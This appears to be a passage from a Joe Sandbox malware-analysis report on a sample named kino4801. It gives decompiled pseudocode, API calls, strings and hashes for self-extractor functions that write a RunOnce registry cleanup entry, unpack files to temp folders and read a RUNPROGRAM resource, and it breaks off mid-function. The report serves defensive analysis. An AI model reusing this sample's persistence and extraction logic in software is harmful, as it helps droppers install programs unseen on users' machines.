Instruction Fuzzy Hash: 9A319232605741ABD330DAB4CD88AEB77ECAFC4305F04492DB9D587180EF7895098752

Uniqueness

Uniqueness Score: -1.00%

Function 010D2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E010D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x10da288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x10d9124 = 0;
				if(E010D2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E010D2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E010D52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x10d8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x10d9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E010D1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x10d8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x10d9124; // 0x0
				return _t7;
			}

0x010d2c03
0x010d2c0d
0x010d2c18
0x010d2c20
0x010d2c2e
0x010d2c32
0x010d2c36
0x010d2c3d
0x010d2c43
0x010d2c45
0x010d2c47
0x010d2c49
0x010d2c4e
0x010d2c4e
0x010d2c47
0x010d2c32
0x010d2c20
0x010d2c50
0x010d2c54
0x010d2c57
0x010d2c64
0x010d2c66
0x010d2c6b
0x010d2c6d
0x010d2c74
0x010d2c76
0x010d2c7c
0x010d2c7e
0x010d2c87
0x010d2c89
0x010d2c89
0x010d2c87
0x010d2c7c
0x010d2c74
0x010d2c8e
0x010d2c95
0x010d2c98
0x010d2c98
0x010d2c9e
0x010d2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010D2C28
CloseHandle.KERNEL32(00000000,?,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C98

Strings

Kernel32.dll, xrefs: 010D2C13
HeapSetInformation, xrefs: 010D2C22

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
Instruction ID: 55c93763009cd4959a9789fbfad85669d53e7c3be164d9d516da10407b26cf7e
Opcode Fuzzy Hash: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
Instruction Fuzzy Hash: A911E57130130A9BE7307BF9A888A6B3FA99B84394B041059FED0D3248DA3AEC418764

Uniqueness

Uniqueness Score: -1.00%

Function 010D6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D6F40() {

				SetUnhandledExceptionFilter(E010D6EF0); // executed
				return 0;
			}

0x010d6f45
0x010d6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010D6F45

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
Instruction ID: d0d7e6586172d70d0494d79137eee9ddc826bc1724da360a78826841706d5256
Opcode Fuzzy Hash: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
Instruction Fuzzy Hash: 0F900274352200D796201B71991941575915E4D6427815464E491C9448DB6640405611

Uniqueness

Uniqueness Score: -1.00%

Function 010D202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E010D202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x10d8004; // 0x261cebeb
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E010D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E010D171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E010D658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x10d91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10d91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10d91e5);
						if(_t90 != 0) {
							 *0x10d8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E010D171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E010D658A( &_v268, 0x104, 0x10d1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x10d8530 = _t66;
				goto L23;
			}

0x010d202a
0x010d2035
0x010d203c
0x010d2041
0x010d2050
0x010d205f
0x010d2064
0x010d206f
0x010d208c
0x010d2094
0x010d2257
0x010d2266
0x010d2266
0x010d209a
0x010d209b
0x010d209d
0x010d20aa
0x010d20af
0x010d20c9
0x010d20d1
0x00000000
0x00000000
0x010d20d3
0x010d20da
0x00000000
0x00000000
0x00000000
0x010d20da
0x010d20e2
0x010d2103
0x010d210e
0x010d2116
0x010d2122
0x010d2128
0x010d212c
0x010d2179
0x010d2194
0x010d21de
0x010d21e4
0x010d2256
0x010d2256
0x00000000
0x010d2256
0x010d2196
0x010d2196
0x010d219c
0x010d219f
0x010d219f
0x010d21a1
0x010d21a2
0x010d21a6
0x010d21a8
0x010d21b0
0x010d21b0
0x010d21b2
0x010d21b3
0x010d21bc
0x010d21c7
0x010d21cb
0x010d21f1
0x010d21f6
0x010d21fd
0x010d21ff
0x010d21ff
0x010d2204
0x010d2213
0x010d2218
0x010d221d
0x010d221d
0x010d2220
0x010d2220
0x010d2222
0x010d2223
0x010d2229
0x010d223d
0x010d2249
0x010d2250
0x00000000
0x010d2250
0x010d21d2
0x010d21d9
0x00000000
0x010d21d9
0x010d213a
0x010d2141
0x010d2144
0x010d214c
0x00000000
0x00000000
0x010d2163
0x010d2172
0x010d2172
0x00000000
0x010d2163
0x010d20ea
0x010d20f0
0x00000000

APIs

memset.MSVCRT ref: 010D2050
memset.MSVCRT ref: 010D205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010D208C

Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20EA
GetSystemDirectoryA.KERNEL32 ref: 010D2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010D2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2144
GetSystemDirectoryA.KERNEL32 ref: 010D215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010D223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2250

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010D21F6
advpack.dll, xrefs: 010D2109
DelNodeRunDLL32, xrefs: 010D212E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010D2082
wextract_cleanup%d, xrefs: 010D209E
wextract_cleanup3, xrefs: 010D20A5, 010D20BE, 010D20F0, 010D2232
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D21A8, 010D2204
%s /D:%s, xrefs: 010D21FF, 010D2210

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
API String ID: 178549006-1281856606
Opcode ID: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
Instruction ID: 8d1a3d47011323622309a21cf03de7f05142ac7ffcb73a483c0e2085f8f52de0
Opcode Fuzzy Hash: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
Instruction Fuzzy Hash: 6851F179A01314ABDB309B74DC48FFA7B7CEB50700F0081A9FEC9E7145DA769A858B60

Uniqueness

Uniqueness Score: -1.00%

Function 010D55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E010D55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x10d8004; // 0x261cebeb
				_v8 = _t28 ^ _t110;
				_t2 = E010D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E010D468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x10d9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x10d8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x10d8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E010D6517(_t82, 0x7d2, 0, E010D3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x10d9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x10d91e4;
									_t40 = GetTempPathA(0x104, 0x10d91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E010D1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E010D6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E010D597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E010D2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E010D658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10d91e4;
																					E010D1781(0x10d91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E010D5467(0x10d91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E010D2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E010D597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E010D5467(0x10d91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10d91e4;
											_t70 = E010D2630(0, 0x10d91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10d91e4;
												_t71 = E010D5467(0x10d91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E010D597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x10d8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E010D5467(0x10d8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010D44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x10d9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x10d9124 = E010D6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E010D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x010d55ab
0x010d55b2
0x010d55c9
0x010d55d5
0x010d55d9
0x010d5600
0x010d5605
0x010d560a
0x010d560c
0x010d5638
0x010d5641
0x010d5643
0x010d5645
0x010d5645
0x010d564c
0x010d5652
0x010d5657
0x010d5659
0x010d5696
0x010d569c
0x010d589f
0x010d58a7
0x010d58ac
0x010d58b3
0x010d58b5
0x010d56a2
0x010d56a2
0x010d56a8
0x00000000
0x010d56ae
0x010d56ae
0x010d56b9
0x010d56bf
0x010d56c1
0x010d56f3
0x010d56f3
0x010d5705
0x010d570a
0x010d5711
0x010d5717
0x010d5724
0x010d5726
0x010d5729
0x010d5730
0x010d5737
0x010d573d
0x010d5740
0x00000000
0x00000000
0x00000000
0x00000000
0x010d572b
0x010d572b
0x010d572e
0x010d5742
0x010d5742
0x010d5745
0x010d576b
0x010d576b
0x00000000
0x010d5747
0x010d5747
0x010d574d
0x010d574f
0x010d5771
0x010d5771
0x010d5773
0x00000000
0x010d5751
0x010d5751
0x010d5753
0x00000000
0x010d5755
0x010d575b
0x010d5760
0x010d5762
0x00000000
0x010d5764
0x010d5764
0x010d5769
0x010d577e
0x010d577e
0x010d5781
0x010d5788
0x010d578d
0x010d578f
0x010d57b2
0x010d57b8
0x010d57bd
0x010d57bf
0x010d57cd
0x010d57cd
0x010d57dd
0x010d57e3
0x010d57ef
0x010d57f5
0x010d57f8
0x010d580a
0x010d580a
0x010d57fa
0x010d5802
0x010d5802
0x010d580d
0x010d580f
0x010d5830
0x010d5836
0x010d583d
0x010d584b
0x010d5851
0x010d5855
0x010d585a
0x010d585c
0x00000000
0x010d585e
0x010d585e
0x00000000
0x010d585e
0x010d5811
0x010d5817
0x010d5819
0x010d581f
0x00000000
0x010d581f
0x010d5791
0x010d5797
0x010d579c
0x010d579e
0x00000000
0x010d57a0
0x010d57a9
0x010d57ae
0x010d57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x010d57b0
0x010d579e
0x00000000
0x00000000
0x00000000
0x010d5769
0x010d5762
0x010d5753
0x010d574f
0x00000000
0x00000000
0x00000000
0x010d572e
0x00000000
0x010d5864
0x010d5864
0x010d5864
0x010d5717
0x00000000
0x010d56c3
0x010d56c5
0x010d56c9
0x010d56ce
0x010d56d0
0x00000000
0x010d56d6
0x010d56d6
0x010d56d8
0x010d56dd
0x010d56df
0x00000000
0x010d56e1
0x010d56e2
0x010d56e4
0x010d56e6
0x010d56eb
0x010d56ed
0x00000000
0x010d56f3
0x010d56f3
0x00000000
0x010d586c
0x010d5878
0x010d587e
0x010d5882
0x010d5883
0x010d5889
0x010d588e
0x010d588e
0x00000000
0x010d5896
0x010d56ed
0x010d56df
0x010d56d0
0x010d56c1
0x010d56a8
0x010d565b
0x010d565b
0x010d565d
0x010d5669
0x010d5669
0x010d565f
0x010d565f
0x010d5665
0x010d5667
0x00000000
0x00000000
0x010d5667
0x010d566c
0x010d5673
0x010d5678
0x010d567a
0x010d589b
0x010d589b
0x010d5680
0x010d5685
0x010d568c
0x00000000
0x010d568c
0x010d567a
0x010d560e
0x010d5613
0x010d561a
0x010d5620
0x010d5626
0x00000000
0x010d5626
0x010d55db
0x010d55e0
0x010d55e7
0x010d55f1
0x010d55f6
0x010d55f6
0x010d55f6
0x010d58b7
0x010d58c7

APIs

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010D55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010D5638
LocalFree.KERNEL32(00000000), ref: 010D564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5620

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010D571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010D5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010D57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010D57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010D5802

Part of subcall function 010D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010D2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010D5830

Part of subcall function 010D6517: FindResourceA.KERNEL32(010D0000,000007D6,00000005), ref: 010D652A
Part of subcall function 010D6517: LoadResource.KERNEL32(010D0000,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(010D0000,00000000,00000547,010D19E0,00000000), ref: 010D6557
Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010D5878

Part of subcall function 010D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
Part of subcall function 010D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF

Strings

<None>, xrefs: 010D5632
msdownld.tmp, xrefs: 010D57D3
RUNPROGRAM, xrefs: 010D55BD, 010D5600
Z, xrefs: 010D570A
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D56AE, 010D56B3, 010D583D
A:\, xrefs: 010D56F4

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-752058184
Opcode ID: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
Instruction ID: b5e51a2693d29ccb0a445e1d2ad9fff9d3cfed90477a5a322974a52b8eba9b6e
Opcode Fuzzy Hash: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
Instruction Fuzzy Hash: 638114B0B043159AEB71AA78AC84BFE76BDAF65340F0400E5EDC6E3185EE758DC18B50

Uniqueness

Uniqueness Score: -1.00%

Function 010D597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E010D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
